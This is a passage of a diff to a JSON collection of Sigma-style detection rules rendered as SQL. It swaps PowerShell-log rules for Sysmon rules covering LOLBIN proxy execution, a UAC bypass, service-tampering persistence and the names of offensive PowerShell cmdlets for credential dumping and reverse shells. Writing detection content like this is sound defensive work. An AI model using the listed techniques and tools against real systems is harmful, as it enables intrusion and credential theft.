This cradle uses nslookup to extract payloads from DNS records", - "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ + "attack.command_and_control", "attack.execution", - "attack.t1059.001" + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Netcat The Powershell Version", - "id": "c5b20776-639a-49bf-94c7-84f912b91c15", - "status": "test", - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "title": "Potential COM Objects Download Cradles Usage - Process Creation", + "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", + "status": "experimental", + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1095" - ], "falsepositives": [ - "Unknown" + "Legitimate use of 
the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_pc_powercat.yml" + "filename": "proc_creation_win_powershell_download_com_cradles.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", - "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "title": "Use of Pcalua For Execution", + "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "status": "experimental", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems), E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_lolbin_pcalua.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": 
[ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", + "title": "PUA - Potential PE Metadata Tamper Using Rcedit", + "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", + "author": "Micah Babinski", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.003", + "attack.t1036", + "attack.t1027.005", + "attack.t1027" ], 
"falsepositives": [ - "Unknown" + "Legitimate use of the tool by administrators or users to update metadata of a binary" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_pua_rcedit_execution.yml" }, { - "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", - "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "title": "HackTool - Jlaive In-Memory Assembly Execution", + "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", "status": "experimental", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + 
"attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "App-V clients" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" ], - "filename": "posh_pm_syncappvpublishingserver_exe.yml" + "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", - "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "title": "Suspicious Msiexec Execute Arbitrary DLL", + "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' 
AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" + "filename": "proc_creation_win_msiexec_execute_dll.yml" }, { - "title": "Invoke-Obfuscation COMPRESS 
OBFUSCATION - PowerShell Module", - "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_pm_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "Potential Persistence Attempt Via Existing Service Tampering", + "id": "38879043-7e1e-47a9-8d46-6bec88e201df", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification 
of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + }, + { + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", + "status": "experimental", + "description": "Detects 
usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE 
'%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE 
'\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR 
Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' 